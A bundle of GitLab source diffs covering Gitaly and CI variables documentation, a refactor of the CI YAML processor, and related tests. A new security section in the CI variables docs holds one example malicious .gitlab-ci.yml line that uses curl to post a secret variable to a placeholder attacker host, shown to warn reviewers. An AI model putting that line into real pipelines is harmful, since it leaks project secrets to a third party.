[standalone Gitaly documentation](../gitaly/index.md).
NOTE: **Note:**
The token referred to throughout the Gitaly documentation is an arbitrary
password selected by the administrator. This token is unrelated to tokens
created for the GitLab API or other similar web API tokens.
Note: **Note:** The token referred to throughout the Gitaly documentation is
just an arbitrary password selected by the administrator. It is unrelated to
tokens created for the GitLab API or other similar web API tokens.
Below we describe how to configure one Gitaly server `gitaly1.internal` with
secret token `gitalysecret`. We assume your GitLab installation has two
repository storages: `default` and `storage1`.
The following procedure describes how to configure a single Gitaly server named
`gitaly1.internal` with the secret token `gitalysecret`. We assume your GitLab
installation has two repository storages: `default` and `storage1`.
To configure the Gitaly server:
1. [Download/Install](https://about.gitlab.com/install/) the Omnibus GitLab
package you want using **steps 1 and 2** from the GitLab downloads page but
**without** providing the `EXTERNAL_URL` value.
1. Edit `/etc/gitlab/gitlab.rb` to configure storage paths, enable
the network listener and configure the token:
1. On the server node you want to use for Gitaly,
[download and install](https://about.gitlab.com/install/) your selected
Omnibus GitLab package using *steps 1 and 2* from the GitLab downloads page,
but *without* providing the `EXTERNAL_URL` value.
1. Edit the Gitaly server node's `/etc/gitlab/gitlab.rb` file to configure
storage paths, enable the network listener, and to configure the token:
<!--
updates to following example must also be made at
@ -440,11 +441,7 @@ To configure the Gitaly server:
# Set the network addresses that the exporters used for monitoring will listen on
node_exporter['listen_address'] = '0.0.0.0:9100'
```
1. Append the following to `/etc/gitlab/gitlab.rb` on `gitaly1.internal`:
```ruby
git_data_dirs({
'default' => {
'path' => '/var/opt/gitlab/git-data'
@ -455,12 +452,7 @@ To configure the Gitaly server:
})
```
<!--
updates to following example must also be made at
https://gitlab.com/gitlab-org/charts/gitlab/blob/master/doc/advanced/external-gitaly/external-omnibus-gitaly.md#configure-omnibus-gitlab
-->
1. Save the file and [reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure).
1. Save the file, and then [reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure).
1. Confirm that Gitaly can perform callbacks to the internal API:
```shell

View File

@ -141,6 +141,25 @@ The output is:
![Output custom variable](img/custom_variables_output.png)
Variables can only be updated or viewed by project members with [maintainer permissions](../../user/permissions.md#project-members-permissions).
#### Security
Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a [protected branch](../../user/project/protected_branches.md) or [protected tag](../../user/project/protected_tags.md), it could also compromise protected variables.
All merge requests that introduce changes to `.gitlab-ci.yml` should be reviewed carefully before:
- [Running a pipeline in the parent project for a merge request submitted from a forked project](../merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project-starter).
- Merging the changes.
Here is a simplified example of a malicious `.gitlab-ci.yml`:
```yaml
build:
script:
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" https://maliciouswebsite.abcd/
```
### Custom environment variables of type Variable
> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/46806) in GitLab 11.11.
@ -215,8 +234,8 @@ You can't mask variables that don't meet these requirements.
> Introduced in GitLab 9.3.
Variables can be protected. When a variable is
protected, it is securely passed to pipelines running on
[protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md) only. The other pipelines do not get
protected, it is only passed to pipelines running on
[protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md). The other pipelines do not get
the protected variable.
To protect a variable:
@ -227,8 +246,7 @@ To protect a variable:
1. Select the **Protect variable** check box.
1. Click **Update variable**.
The variable is available for all subsequent pipelines. Protected variables can only
be updated or viewed by project members with [maintainer permissions](../../user/permissions.md#project-members-permissions).
The variable is available for all subsequent pipelines.
### Custom variables validated by GitLab

View File

@ -43,6 +43,7 @@ Kubernetes-specific environment variables are detailed in the
| `CI_COMMIT_BRANCH` | 12.6 | 0.5 | The commit branch name. Present only when building branches. |
| `CI_COMMIT_TAG` | 9.0 | 0.5 | The commit tag name. Present only when building tags. |
| `CI_COMMIT_TITLE` | 10.8 | all | The title of the commit - the full first line of the message |
| `CI_COMMIT_TIMESTAMP` | 13.4 | all | The timestamp of the commit in the ISO 8601 format. |
| `CI_CONCURRENT_ID` | all | 11.10 | Unique ID of build execution within a single executor. |
| `CI_CONCURRENT_PROJECT_ID` | all | 11.10 | Unique ID of build execution within a single executor and project. |
| `CI_CONFIG_PATH` | 9.4 | 0.5 | The path to CI configuration file. Defaults to `.gitlab-ci.yml` |

View File

@ -1335,6 +1335,8 @@ expression string per rule, rather than an array of them. Any set of expressions
evaluated can be [conjoined into a single expression](../variables/README.md#conjunction--disjunction)
by using `&&` or `||`, and use
the [variable matching syntax](../variables/README.md#syntax-of-environment-variable-expressions).
Unlike variables in [`script`](../variables/README.md#syntax-of-environment-variables-in-job-scripts)
sections, variables in rules expressions are always formatted as `$VARIABLE`.
`if:` clauses are evaluated based on the values of [predefined environment variables](../variables/predefined_variables.md)
or [custom environment variables](../variables/README.md#custom-environment-variables).

View File

@ -263,8 +263,6 @@ For reference, GitLab.com's [auto-scaling shared runner](../user/gitlab_com/inde
CAUTION: **Caution:**
With GitLab 13.0 (May 2020) we have removed official support for Internet Explorer 11.
With the release of GitLab 13.4 (September 2020) we will remove all code that supports Internet Explorer 11.
You can provide feedback [on this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/197987) or via your usual support channels.
GitLab supports the following web browsers:
@ -276,7 +274,7 @@ GitLab supports the following web browsers:
For the listed web browsers, GitLab supports:
- The current and previous major versions of browsers except Internet Explorer.
- The current and previous major versions of browsers.
- The current minor version of a supported major version.
NOTE: **Note:**

View File

@ -95,7 +95,7 @@ module API
optional :visibility, type: String,
values: Gitlab::VisibilityLevel.string_values,
desc: 'The visibility of the snippet'
at_least_one_of :title, :file_name, :content, :visibility_level
at_least_one_of :title, :file_name, :content, :visibility
end
# rubocop: disable CodeReuse/ActiveRecord
put ":id/snippets/:snippet_id" do

View File

@ -62,6 +62,10 @@ module Gitlab
root.jobs_value
end
def normalized_jobs
@normalized_jobs ||= Ci::Config::Normalizer.new(jobs).normalize_jobs
end
private
def expand_config(config)

View File

@ -11,6 +11,7 @@ module Gitlab
end
def normalize_jobs
return {} unless @jobs_config
return @jobs_config if parallelized_jobs.empty?
expand_parallelize_jobs do |job_name, config|

View File

@ -45,14 +45,15 @@ module Gitlab
end
def static_validation(content)
result = Gitlab::Ci::YamlProcessor.new_with_validation_errors(
result = Gitlab::Ci::YamlProcessor.new(
content,
project: @project,
user: @current_user,
sha: @project.repository.commit.sha)
sha: @project.repository.commit.sha
).execute
Result.new(
jobs: static_validation_convert_to_jobs(result.config&.stages, result.config&.builds),
jobs: static_validation_convert_to_jobs(result),
errors: result.errors,
warnings: result.warnings
)
@ -76,12 +77,12 @@ module Gitlab
end
end
def static_validation_convert_to_jobs(stages, all_jobs)
def static_validation_convert_to_jobs(result)
jobs = []
return jobs unless stages || all_jobs
return jobs unless result.valid?
stages.each do |stage_name|
all_jobs.each do |job|
result.stages.each do |stage_name|
result.builds.each do |job|
next unless job[:stage] == stage_name
jobs << {

View File

@ -11,20 +11,23 @@ module Gitlab
def perform!
raise ArgumentError, 'missing config content' unless @command.config_content
@command.config_processor = ::Gitlab::Ci::YamlProcessor.new(
result = ::Gitlab::Ci::YamlProcessor.new(
@command.config_content, {
project: project,
sha: @pipeline.sha,
user: current_user,
parent_pipeline: parent_pipeline
}
)
).execute
add_warnings_to_pipeline(@command.config_processor.warnings)
rescue Gitlab::Ci::YamlProcessor::ValidationError => ex
add_warnings_to_pipeline(ex.warnings)
add_warnings_to_pipeline(result.warnings)
if result.valid?
@command.config_processor = result
else
error(result.errors.first, config_error: true)
end
error(ex.message, config_error: true)
rescue => ex
Gitlab::ErrorTracking.track_exception(ex,
project_id: project.id,

View File

@ -1,183 +1,65 @@
# frozen_string_literal: true
# This is the CI Linter component that runs the syntax validations
# while parsing the YAML config into a data structure that is
# then presented to the caller as result object.
# After syntax validations (done by Ci::Config), this component also
# runs logical validation on the built data structure.
module Gitlab
module Ci
class YamlProcessor
# ValidationError is treated like a result object in the form of an exception.
# We can return any warnings, raised during the config validation, along with
# the error object until we support multiple messages to be returned.
class ValidationError < StandardError
attr_reader :warnings
def initialize(message, warnings: [])
@warnings = warnings
super(message)
end
end
include Gitlab::Config::Entry::LegacyValidationHelpers
attr_reader :stages, :jobs
class Result
attr_reader :config, :errors, :warnings
def initialize(config: nil, errors: [], warnings: [])
@config = config
@errors = errors
@warnings = warnings
end
def valid?
config.present? && errors.empty?
end
end
def initialize(config, opts = {})
@ci_config = Gitlab::Ci::Config.new(config, **opts)
@config = @ci_config.to_hash
unless @ci_config.valid?
error!(@ci_config.errors.first)
end
initial_parsing
rescue Gitlab::Ci::Config::ConfigError => e
error!(e.message)
end
def self.new_with_validation_errors(content, opts = {})
return Result.new(errors: ['Please provide content of .gitlab-ci.yml']) if content.blank?
config = Gitlab::Ci::Config.new(content, **opts)
return Result.new(errors: config.errors, warnings: config.warnings) unless config.valid?
config = Gitlab::Ci::YamlProcessor.new(content, opts)
Result.new(config: config, warnings: config.warnings)
rescue ValidationError => e
Result.new(errors: [e.message], warnings: e.warnings)
rescue Gitlab::Ci::Config::ConfigError => e
Result.new(errors: [e.message])
end
def warnings
@ci_config&.warnings || []
end
def builds
@jobs.map do |name, _|
build_attributes(name)
end
end
def build_attributes(name)
job = @jobs.fetch(name.to_sym, {})
{ stage_idx: @stages.index(job[:stage]),
stage: job[:stage],
tag_list: job[:tags],
name: job[:name].to_s,
allow_failure: job[:ignore],
when: job[:when] || 'on_success',
environment: job[:environment_name],
coverage_regex: job[:coverage],
yaml_variables: transform_to_yaml_variables(job[:variables]),
needs_attributes: job.dig(:needs, :job),
interruptible: job[:interruptible],
only: job[:only],
except: job[:except],
rules: job[:rules],
cache: job[:cache],
resource_group_key: job[:resource_group],
scheduling_type: job[:scheduling_type],
secrets: job[:secrets],
options: {
image: job[:image],
services: job[:services],
artifacts: job[:artifacts],
dependencies: job[:dependencies],
cross_dependencies: job.dig(:needs, :cross_dependency),
job_timeout: job[:timeout],
before_script: job[:before_script],
script: job[:script],
after_script: job[:after_script],
environment: job[:environment],
retry: job[:retry],
parallel: job[:parallel],
instance: job[:instance],
start_in: job[:start_in],
trigger: job[:trigger],
bridge_needs: job.dig(:needs, :bridge)&.first,
release: release(job)
}.compact }.compact
end
def release(job)
job[:release]
end
def stage_builds_attributes(stage)
@jobs.values
.select { |job| job[:stage] == stage }
.map { |job| build_attributes(job[:name]) }
end
def stages_attributes
@stages.uniq.map do |stage|
seeds = stage_builds_attributes(stage)
{ name: stage, index: @stages.index(stage), builds: seeds }
end
end
def workflow_attributes
{
rules: @config.dig(:workflow, :rules),
yaml_variables: transform_to_yaml_variables(@variables)
}
end
ValidationError = Class.new(StandardError)
def self.validation_message(content, opts = {})
return 'Please provide content of .gitlab-ci.yml' if content.blank?
result = new(content, opts).execute
begin
Gitlab::Ci::YamlProcessor.new(content, opts)
nil
rescue ValidationError => e
e.message
result.errors.first
end
def initialize(config_content, opts = {})
@config_content = config_content
@opts = opts
end
def execute
if @config_content.blank?
return Result.new(errors: ['Please provide content of .gitlab-ci.yml'])
end
@ci_config = Gitlab::Ci::Config.new(@config_content, **@opts)
unless @ci_config.valid?
return Result.new(ci_config: @ci_config, errors: @ci_config.errors, warnings: @ci_config.warnings)
end
run_logical_validations!
Result.new(ci_config: @ci_config, warnings: @ci_config&.warnings)
rescue Gitlab::Ci::Config::ConfigError => e
Result.new(ci_config: @ci_config, errors: [e.message], warnings: @ci_config&.warnings)
rescue ValidationError => e
Result.new(ci_config: @ci_config, errors: [e.message], warnings: @ci_config&.warnings)
end
private
def initial_parsing
##
# Global config
#
@variables = @ci_config.variables
def run_logical_validations!
@stages = @ci_config.stages
##
# Jobs
#
@jobs = Ci::Config::Normalizer.new(@ci_config.jobs).normalize_jobs
@jobs = @ci_config.normalized_jobs
@jobs.each do |name, job|
# logical validation for job
validate_job_stage!(name, job)
validate_job_dependencies!(name, job)
validate_job_needs!(name, job)
validate_dynamic_child_pipeline_dependencies!(name, job)
validate_job_environment!(name, job)
validate_job!(name, job)
end
end
def transform_to_yaml_variables(variables)
variables.to_h.map do |key, value|
{ key: key.to_s, value: value, public: true }
end
def validate_job!(name, job)
validate_job_stage!(name, job)
validate_job_dependencies!(name, job)
validate_job_needs!(name, job)
validate_dynamic_child_pipeline_dependencies!(name, job)
validate_job_environment!(name, job)
end
def validate_job_stage!(name, job)
@ -188,10 +70,6 @@ module Gitlab
end
end
def error!(message)
raise ValidationError.new(message, warnings: warnings)
end
def validate_job_dependencies!(name, job)
return unless job[:dependencies]
@ -267,6 +145,10 @@ module Gitlab
error!("#{name} job: on_stop job #{on_stop} needs to have action stop defined")
end
end
def error!(message)
raise ValidationError.new(message)
end
end
end
end

View File

@ -0,0 +1,120 @@
# frozen_string_literal: true
# A data object that wraps `Ci::Config` and any messages
# (errors, warnings) generated by the YamlProcessor.
module Gitlab
module Ci
class YamlProcessor
class Result
attr_reader :errors, :warnings
def initialize(ci_config: nil, errors: [], warnings: [])
@ci_config = ci_config
@errors = errors || []
@warnings = warnings || []
end
def valid?
errors.empty?
end
def stages_attributes
stages.uniq.map do |stage|
seeds = stage_builds_attributes(stage)
{ name: stage, index: stages.index(stage), builds: seeds }
end
end
def builds
jobs.map do |name, _|
build_attributes(name)
end
end
def stage_builds_attributes(stage)
jobs.values
.select { |job| job[:stage] == stage }
.map { |job| build_attributes(job[:name]) }
end
def workflow_attributes
{
rules: hash_config.dig(:workflow, :rules),
yaml_variables: transform_to_yaml_variables(variables)
}
end
def jobs
@jobs ||= @ci_config.normalized_jobs
end
def stages
@stages ||= @ci_config.stages
end
def build_attributes(name)
job = jobs.fetch(name.to_sym, {})
{ stage_idx: stages.index(job[:stage]),
stage: job[:stage],
tag_list: job[:tags],
name: job[:name].to_s,
allow_failure: job[:ignore],
when: job[:when] || 'on_success',
environment: job[:environment_name],
coverage_regex: job[:coverage],
yaml_variables: transform_to_yaml_variables(job[:variables]),
needs_attributes: job.dig(:needs, :job),
interruptible: job[:interruptible],
only: job[:only],
except: job[:except],
rules: job[:rules],
cache: job[:cache],
resource_group_key: job[:resource_group],
scheduling_type: job[:scheduling_type],
secrets: job[:secrets],
options: {
image: job[:image],
services: job[:services],
artifacts: job[:artifacts],
dependencies: job[:dependencies],
cross_dependencies: job.dig(:needs, :cross_dependency),
job_timeout: job[:timeout],
before_script: job[:before_script],
script: job[:script],
after_script: job[:after_script],
environment: job[:environment],
retry: job[:retry],
parallel: job[:parallel],
instance: job[:instance],
start_in: job[:start_in],
trigger: job[:trigger],
bridge_needs: job.dig(:needs, :bridge)&.first,
release: release(job)
}.compact }.compact
end
private
def variables
@variables ||= @ci_config.variables
end
def hash_config
@hash_config ||= @ci_config.to_hash
end
def release(job)
job[:release]
end
def transform_to_yaml_variables(variables)
variables.to_h.map do |key, value|
{ key: key.to_s, value: value, public: true }
end
end
end
end
end
end

View File

@ -17338,18 +17338,12 @@ msgstr ""
msgid "Outbound requests"
msgstr ""
msgid "OutdatedBrowser|From May 2020 GitLab no longer supports Internet Explorer 11."
msgstr ""
msgid "OutdatedBrowser|GitLab may not work properly, because you are using an outdated web browser."
msgstr ""
msgid "OutdatedBrowser|Please install a %{browser_link_start}supported web browser%{browser_link_end} for a better experience."
msgstr ""
msgid "OutdatedBrowser|You can provide feedback %{feedback_link_start}on this issue%{feedback_link_end} or via your usual support channels."
msgstr ""
msgid "Outdent"
msgstr ""

View File

@ -98,7 +98,7 @@ RSpec.describe Projects::Ci::LintsController do
it_behaves_like 'returns a successful validation'
it 'runs validations through YamlProcessor' do
expect(Gitlab::Ci::YamlProcessor).to receive(:new_with_validation_errors).and_call_original
expect(Gitlab::Ci::YamlProcessor).to receive(:new).and_call_original
subject
end
@ -126,7 +126,7 @@ RSpec.describe Projects::Ci::LintsController do
it_behaves_like 'returns a successful validation'
it 'runs validations through YamlProcessor' do
expect(Gitlab::Ci::YamlProcessor).to receive(:new_with_validation_errors).and_call_original
expect(Gitlab::Ci::YamlProcessor).to receive(:new).and_call_original
subject
end

View File

@ -201,33 +201,61 @@ RSpec.describe Projects::JobsController, :clean_gitlab_redis_shared_state do
end
context 'when job has artifacts' do
before do
get_show_json
end
context 'with not expiry date' do
let(:job) { create(:ci_build, :success, :artifacts, pipeline: pipeline) }
it 'exposes needed information' do
get_show_json
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']['download_path']).to match(%r{artifacts/download})
expect(json_response['artifact']['browse_path']).to match(%r{artifacts/browse})
expect(json_response['artifact']).not_to have_key('keep_path')
expect(json_response['artifact']).not_to have_key('expired')
expect(json_response['artifact']).not_to have_key('expired_at')
end
end
context 'with expiry date' do
context 'with expired artifacts' do
let(:job) { create(:ci_build, :success, :artifacts, :expired, pipeline: pipeline) }
it 'exposes needed information' do
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']).not_to have_key('download_path')
expect(json_response['artifact']).not_to have_key('browse_path')
expect(json_response['artifact']['expired']).to eq(true)
expect(json_response['artifact']['expire_at']).not_to be_empty
context 'when artifacts are unlocked' do
before do
job.pipeline.unlocked!
end
it 'exposes needed information' do
get_show_json
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']).not_to have_key('download_path')
expect(json_response['artifact']).not_to have_key('browse_path')
expect(json_response['artifact']).not_to have_key('keep_path')
expect(json_response['artifact']['expired']).to eq(true)
expect(json_response['artifact']['expire_at']).not_to be_empty
expect(json_response['artifact']['locked']).to eq(false)
end
end
context 'when artifacts are locked' do
before do
job.pipeline.artifacts_locked!
end
it 'exposes needed information' do
get_show_json
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']).to have_key('download_path')
expect(json_response['artifact']).to have_key('browse_path')
expect(json_response['artifact']).to have_key('keep_path')
expect(json_response['artifact']['expired']).to eq(true)
expect(json_response['artifact']['expire_at']).not_to be_empty
expect(json_response['artifact']['locked']).to eq(true)
end
end
end
end

View File

@ -49,6 +49,7 @@ RSpec.describe Projects::MergeRequests::ContentController do
do_request(:widget)
expect(response).to match_response_schema('entities/merge_request_poll_widget')
expect(response.headers['Poll-Interval']).to eq('10000')
end
@ -64,6 +65,20 @@ RSpec.describe Projects::MergeRequests::ContentController do
expect(response.headers['Poll-Interval']).to eq('300000')
end
end
context 'with coverage data' do
let(:merge_request) { create(:merge_request, target_project: project, source_project: project, head_pipeline: head_pipeline) }
let!(:base_pipeline) { create(:ci_empty_pipeline, project: project, ref: merge_request.target_branch, sha: merge_request.diff_base_sha) }
let!(:head_pipeline) { create(:ci_empty_pipeline, project: project) }
let!(:rspec_base) { create(:ci_build, name: 'rspec', coverage: 93.1, pipeline: base_pipeline) }
let!(:rspec_head) { create(:ci_build, name: 'rspec', coverage: 97.1, pipeline: head_pipeline) }
it 'renders widget MR entity as json' do
do_request(:widget)
expect(response).to match_response_schema('entities/merge_request_poll_widget')
end
end
end
end

View File

@ -0,0 +1,9 @@
# frozen_string_literal: true
FactoryBot.define do
factory :instance_statistics_measurement, class: 'Analytics::InstanceStatistics::Measurement' do
recorded_at { Time.now }
identifier { Analytics::InstanceStatistics::Measurement.identifiers[:projects] }
count { 1_000 }
end
end

View File

@ -373,13 +373,29 @@ RSpec.describe 'Jobs', :clean_gitlab_redis_shared_state do
let(:expire_at) { Time.now + 7.days }
context 'when user has ability to update job' do
it 'keeps artifacts when keep button is clicked' do
expect(page).to have_content 'The artifacts will be removed in'
context 'when artifacts are unlocked' do
before do
job.pipeline.unlocked!
end
click_link 'Keep'
it 'keeps artifacts when keep button is clicked' do
expect(page).to have_content 'The artifacts will be removed in'
expect(page).to have_no_link 'Keep'
expect(page).to have_no_content 'The artifacts will be removed in'
click_link 'Keep'
expect(page).to have_no_link 'Keep'
expect(page).to have_no_content 'The artifacts will be removed in'
end
end
context 'when artifacts are locked' do
before do
job.pipeline.artifacts_locked!
end
it 'shows the keep button' do
expect(page).to have_link 'Keep'
end
end
end
@ -395,9 +411,26 @@ RSpec.describe 'Jobs', :clean_gitlab_redis_shared_state do
context 'when artifacts expired' do
let(:expire_at) { Time.now - 7.days }
it 'does not have the Keep button' do
expect(page).to have_content 'The artifacts were removed'
expect(page).not_to have_link 'Keep'
context 'when artifacts are unlocked' do
before do
job.pipeline.unlocked!
end
it 'does not have the Keep button' do
expect(page).to have_content 'The artifacts were removed'
expect(page).not_to have_link 'Keep'
end
end
context 'when artifacts are locked' do
before do
job.pipeline.artifacts_locked!
end
it 'has the Keep button' do
expect(page).not_to have_content 'The artifacts were removed'
expect(page).to have_link 'Keep'
end
end
end
end

View File

@ -22,6 +22,14 @@
"only_allow_merge_if_pipeline_succeeds": { "type": "boolean" },
"has_ci": { "type": "boolean" },
"ci_status": { "type": ["string", "null"] },
"pipeline_coverage_delta": { "type": ["float", "null"] },
"builds_with_coverage": {
"type": ["array", "null"],
"items": {
"type": "object",
"required": ["name", "coverage"]
}
},
"cancel_auto_merge_path": { "type": ["string", "null"] },
"test_reports_path": { "type": ["string", "null"] },
"create_issue_to_resolve_discussions_path": { "type": ["string", "null"] },

View File

@ -128,26 +128,6 @@ describe('DiffFile', () => {
});
});
it('should auto-expand collapsed files when viewDiffsFileByFile is true', done => {
vm.$destroy();
window.gon = {
features: { autoExpandCollapsedDiffs: true },
};
vm = createComponentWithStore(Vue.extend(DiffFileComponent), createStore(), {
file: JSON.parse(JSON.stringify(diffFileMockDataUnreadable)),
canCurrentUserFork: false,
viewDiffsFileByFile: true,
}).$mount();
vm.$nextTick(() => {
expect(vm.$el.innerText).not.toContain('This diff is collapsed');
window.gon = {};
done();
});
});
it('should be collapsed for renamed files', done => {
vm.renderIt = true;
vm.isCollapsed = false;

View File

@ -0,0 +1,77 @@
import { shallowMount, mount } from '@vue/test-utils';
import MergeConflictWarning from '~/diffs/components/merge_conflict_warning.vue';
import { CENTERED_LIMITED_CONTAINER_CLASSES } from '~/diffs/constants';
const propsData = {
limited: true,
mergeable: true,
resolutionPath: 'a-path',
};
const limitedClasses = CENTERED_LIMITED_CONTAINER_CLASSES.split(' ');
function findResolveButton(wrapper) {
return wrapper.find('.gl-alert-actions a.gl-button:first-child');
}
function findLocalMergeButton(wrapper) {
return wrapper.find('.gl-alert-actions button.gl-button:last-child');
}
describe('MergeConflictWarning', () => {
let wrapper;
const createComponent = (props = {}, { full } = { full: false }) => {
const mounter = full ? mount : shallowMount;
wrapper = mounter(MergeConflictWarning, {
propsData: { ...propsData, ...props },
});
};
afterEach(() => {
wrapper.destroy();
});
it.each`
limited | containerClasses
${true} | ${limitedClasses}
${false} | ${[]}
`(
'has the correct container classes when limited is $limited',
({ limited, containerClasses }) => {
createComponent({ limited });
expect(wrapper.classes()).toEqual(containerClasses);
},
);
it.each`
present | resolutionPath
${false} | ${''}
${true} | ${'some-path'}
`(
'toggles the resolve conflicts button based on the provided resolutionPath "$resolutionPath"',
({ present, resolutionPath }) => {
createComponent({ resolutionPath }, { full: true });
const resolveButton = findResolveButton(wrapper);
expect(resolveButton.exists()).toBe(present);
if (present) {
expect(resolveButton.attributes('href')).toBe(resolutionPath);
}
},
);
it.each`
present | mergeable
${false} | ${false}
${true} | ${true}
`(
'toggles the local merge button based on the provided mergeable property "$mergable"',
({ present, mergeable }) => {
createComponent({ mergeable }, { full: true });
const localMerge = findLocalMergeButton(wrapper);
expect(localMerge.exists()).toBe(present);
},
);
});

View File

@ -16,6 +16,9 @@ describe('graph component', () => {
let wrapper;
const findExpandPipelineBtn = () => wrapper.find('[data-testid="expandPipelineButton"]');
const findAllExpandPipelineBtns = () => wrapper.findAll('[data-testid="expandPipelineButton"]');
beforeEach(() => {
setHTMLFixture('<div class="layout-page"></div>');
});
@ -167,7 +170,7 @@ describe('graph component', () => {
describe('triggered by', () => {
describe('on click', () => {
it('should emit `onClickTriggeredBy` when triggered by linked pipeline is clicked', () => {
const btnWrapper = wrapper.find('.linked-pipeline-content');
const btnWrapper = findExpandPipelineBtn();
btnWrapper.trigger('click');
@ -213,7 +216,7 @@ describe('graph component', () => {
),
});
const btnWrappers = wrapper.findAll('.linked-pipeline-content');
const btnWrappers = findAllExpandPipelineBtns();
const downstreamBtnWrapper = btnWrappers.at(btnWrappers.length - 1);
downstreamBtnWrapper.trigger('click');

View File

@ -13,6 +13,7 @@ describe('pipeline graph job item', () => {
});
};
const triggerActiveClass = 'gl-shadow-x0-y0-b3-s1-blue-500';
const delayedJobFixture = getJSONFixture('jobs/delayed.json');
const mockJob = {
id: 4256,
@ -33,6 +34,18 @@ describe('pipeline graph job item', () => {
},
},
};
const mockJobWithoutDetails = {
id: 4257,
name: 'test',
status: {
icon: 'status_success',
text: 'passed',
label: 'passed',
group: 'success',
details_path: '/root/ci-mock/builds/4257',
has_details: false,
},
};
afterEach(() => {
wrapper.destroy();
@ -61,18 +74,7 @@ describe('pipeline graph job item', () => {
describe('name without link', () => {
beforeEach(() => {
createWrapper({
job: {
id: 4257,
name: 'test',
status: {
icon: 'status_success',
text: 'passed',
label: 'passed',
group: 'success',
details_path: '/root/ci-mock/builds/4257',
has_details: false,
},
},
job: mockJobWithoutDetails,
cssClassJobName: 'css-class-job-name',
jobHovered: 'test',
});
@ -86,7 +88,7 @@ describe('pipeline graph job item', () => {
});
it('should apply hover class and provided class name', () => {
expect(findJobWithoutLink().classes()).toContain('gl-inset-border-1-blue-500');
expect(findJobWithoutLink().classes()).toContain(triggerActiveClass);
expect(findJobWithoutLink().classes()).toContain('css-class-job-name');
});
});
@ -154,4 +156,24 @@ describe('pipeline graph job item', () => {
);
});
});
describe('trigger job highlighting', () => {
it('trigger job should stay highlighted when downstream is expanded', () => {
createWrapper({
job: mockJobWithoutDetails,
pipelineExpanded: { jobName: mockJob.name, expanded: true },
});
expect(findJobWithoutLink().classes()).toContain(triggerActiveClass);
});
it('trigger job should not be highlighted when downstream is closed', () => {
createWrapper({
job: mockJobWithoutDetails,
pipelineExpanded: { jobName: mockJob.name, expanded: false },
});
expect(findJobWithoutLink().classes()).not.toContain(triggerActiveClass);
});
});
});

View File

@ -1,5 +1,5 @@
import { mount } from '@vue/test-utils';
import { GlButton } from '@gitlab/ui';
import { GlButton, GlLoadingIcon } from '@gitlab/ui';
import LinkedPipelineComponent from '~/pipelines/components/graph/linked_pipeline.vue';
import CiStatus from '~/vue_shared/components/ci_icon.vue';
@ -16,10 +16,18 @@ describe('Linked pipeline', () => {
const findButton = () => wrapper.find(GlButton);
const findPipelineLabel = () => wrapper.find('[data-testid="downstream-pipeline-label"]');
const findLinkedPipeline = () => wrapper.find({ ref: 'linkedPipeline' });
const findLoadingIcon = () => wrapper.find(GlLoadingIcon);
const findPipelineLink = () => wrapper.find('[data-testid="childPipelineLink"]');
const findExpandButton = () => wrapper.find('[data-testid="expandPipelineButton"]');
const createWrapper = propsData => {
const createWrapper = (propsData, data = []) => {
wrapper = mount(LinkedPipelineComponent, {
propsData,
data() {
return {
...data,
};
},
});
};
@ -76,7 +84,7 @@ describe('Linked pipeline', () => {
});
it('should render the tooltip text as the title attribute', () => {
const titleAttr = findButton().attributes('title');
const titleAttr = findLinkedPipeline().attributes('title');
expect(titleAttr).toContain(mockPipeline.project.name);
expect(titleAttr).toContain(mockPipeline.details.status.label);
@ -117,6 +125,56 @@ describe('Linked pipeline', () => {
createWrapper(upstreamProps);
expect(findPipelineLabel().exists()).toBe(true);
});
it('downsteram pipeline should link to the child pipeline if child', () => {
createWrapper(downstreamProps);
expect(findPipelineLink().attributes('href')).toBe(mockData.triggered_by.path);
});
it('upstream pipeline should not contain a link', () => {
createWrapper(upstreamProps);
expect(findPipelineLink().exists()).toBe(false);
});
it.each`
presentClass | missingClass
${'gl-right-0'} | ${'gl-left-0'}
${'gl-border-l-1!'} | ${'gl-border-r-1!'}
`(
'pipeline expand button should be postioned right when child pipeline',
({ presentClass, missingClass }) => {
createWrapper(downstreamProps);
expect(findExpandButton().classes()).toContain(presentClass);
expect(findExpandButton().classes()).not.toContain(missingClass);
},
);
it.each`
presentClass | missingClass
${'gl-left-0'} | ${'gl-right-0'}
${'gl-border-r-1!'} | ${'gl-border-l-1!'}
`(
'pipeline expand button should be postioned left when parent pipeline',
({ presentClass, missingClass }) => {
createWrapper(upstreamProps);
expect(findExpandButton().classes()).toContain(presentClass);
expect(findExpandButton().classes()).not.toContain(missingClass);
},
);
it.each`
pipelineType | anglePosition | expanded
${downstreamProps} | ${'angle-right'} | ${false}
${downstreamProps} | ${'angle-left'} | ${true}
${upstreamProps} | ${'angle-left'} | ${false}
${upstreamProps} | ${'angle-right'} | ${true}
`(
'$pipelineType.columnTitle pipeline button icon should be $anglePosition if expanded state is $expanded',
({ pipelineType, anglePosition, expanded }) => {
createWrapper(pipelineType, { expanded });
expect(findExpandButton().props('icon')).toBe(anglePosition);
},
);
});
describe('when isLoading is true', () => {
@ -130,8 +188,8 @@ describe('Linked pipeline', () => {
createWrapper(props);
});
it('sets the loading prop to true', () => {
expect(findButton().props('loading')).toBe(true);
it('loading icon is visible', () => {
expect(findLoadingIcon().exists()).toBe(true);
});
});
@ -172,5 +230,10 @@ describe('Linked pipeline', () => {
findLinkedPipeline().trigger('mouseleave');
expect(wrapper.emitted().downstreamHovered).toStrictEqual([['']]);
});
it('should emit pipelineExpanded with job name and expanded state on click', () => {
findExpandButton().trigger('click');
expect(wrapper.emitted().pipelineExpandToggle).toStrictEqual([['trigger_job', true]]);
});
});
});

View File

@ -264,5 +264,11 @@ RSpec.describe Gitlab::Ci::Config::Normalizer do
is_expected.to match(config)
end
end
